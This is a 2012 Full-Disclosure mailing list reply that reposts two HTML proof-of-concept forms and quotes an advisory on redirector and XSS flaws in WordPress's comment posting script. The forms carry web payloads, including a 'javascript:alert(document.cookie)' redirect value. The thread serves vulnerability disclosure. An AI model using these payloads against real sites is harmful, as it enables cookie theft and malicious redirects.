[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress
- From: InterN0T Advisories <advisories@xxxxxxxxxxxx>
- Date: Sat, 05 May 2012 09:54:02 -0400
Hi List,
To stop MustLive's desperate act of trying to get visitors (and more
backlinks) to his website, I have for those that doesn't want to go to
there, just to see the PoC's but actually read them on this mailing list
like almost _every other_ Proof of Concept / exploit, made them available
below.
Contents of Wordpress Redirector:
<html>
<head>
<title>WordPress Redirector exploit (lol?) (C) 2012 MustLive.
[removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@xxxxxxxxx" />
<input type="hidden" name="comment" value="Test" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to" value="http://awebsite.tld" />
</form>
</body>
</html>
--------------------------------------
Contents of Wordpress XSS:
<html>
<head>
<title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@xxxxxxxxx" />
<input type="hidden" name="comment" value="Test21" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to"
value="javascript:alert%28document.cookie%29//" />
</form>
</body>
</html>
--------------------------------------
I don't really have any comments about these "exploits".
Best regards,
Nemesis 3.0
On Sat, 5 May 2012 16:01:53 +0300, "MustLive"
<mustlive@xxxxxxxxxxxxxxxxxx>
wrote:
> Hello list!
>
> I want to warn you about security vulnerabilities in WordPress.
>
> These are Insufficient Anti-automation, Redirector and Cross-Site
> Scripting
> vulnerabilities.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are WordPress 2.0 - 3.3.1.
>
> ----------
> Details:
> ----------
>
> Already from WP 2.0 there are Insufficient Anti-automation, Redirector
and
> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just
when
> begun using WP in 2006. If the developers fixed vulnerabilities in
> previous
> two redirectors in WP 2.3, then these vulnerabilities were not fixed
even
> in
> WP 3.3.1
>
> IAA (WASC-21):
>
> Lack of captcha in comment form allows to conduct automated attacks. The
> developers still haven't put captcha in WP comments form (from the first
> version of engine), which besides IAA attacks, also allowed to conduct
> Redirector and XSS attacks.
>
> By default in WordPress the premoderation is turned on, and also there
is
> built-in anti-spam filter. But if 10 years ago the premoderation would
be
> enough, then long ago this mechanism couldn't be considered as
sufficient
> protection against spam, and anti-spam filter had efficiency less then
1%
> -
> only few from spam messages he marked as spam. And also these mechanisms
> don't protect against below-mentioned attacks. Also plugin Akismet is
> bundled with WP, which is "captcha-less" protection against spam. But by
> default it's turned off and comparing with captcha it's considered as
less
> efficient and also doesn't protect against below-mentioned attacks.
>
> Redirector (URL Redirector Abuse) (WASC-38):
>
> Exploit:
>
> [Removed]
>
> XSS (WASC-08):
>
> Exploit:
>
> [Removed]
>
> XSS attack is possible on different browsers, but it's harder to conduct
> then in case of previous two redirectors (via data URI). At IIS web
> servers
> the redirect is going via Refresh header, and at other web servers - via
> Location header.
>
> Due to nuances of work of this script (filtering of important symbols
and
> adding of anchor), for execution of JS code it's needed to use tricky
> bypass
> methods. This complexity exists as with javascript URI, as with combo
> variant javascript URI + data URI.
>
> Reliable captcha protects against IAA, Redirector and XSS
vulnerabilities.
>
> ------------
> Timeline:
> ------------
>
> 2012.04.26 - disclosed at my site
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/